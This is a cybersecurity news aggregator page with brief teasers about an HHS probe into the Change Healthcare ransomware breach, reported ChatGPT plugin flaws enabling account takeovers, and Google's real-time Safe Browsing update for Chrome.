Source: www.bleepingcomputer.com – Author: Sergiu Gatlan The U.S. Department of Health and Human Services is investigating whether protected health information was stolen in a ransomware attack that hit UnitedHealthcare Group (UHG) subsidiary Optum, which operates the Change Healthcare platform, in late   show more ...

February. This investigation is coordinated by HHS’ Office for Civil Rights (OCR), which enforces […] La entrada US govt probes if ransomware gang stole Change Healthcare data – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 ChatGPT

Source: thehackernews.com – Author: . Mar 15, 2024NewsroomData Privacy / Artificial Intelligence Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data. According   show more ...

to new research published by Salt Labs, security flaws found directly in ChatGPT […] La entrada Third-Party ChatGPT Plugins Could Lead to Account Takeovers – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . Mar 15, 2024NewsroomBrowser Security / Phishing Attack Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites. “The Standard   show more ...

protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known […] La entrada Google Introduces Enhanced Real-Time URL Protection for Chrome Users – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-03
Aggregator history
Friday, March 15
FRI
SAT
SUN
MON
TUE
WED
THU
MarchAprilMay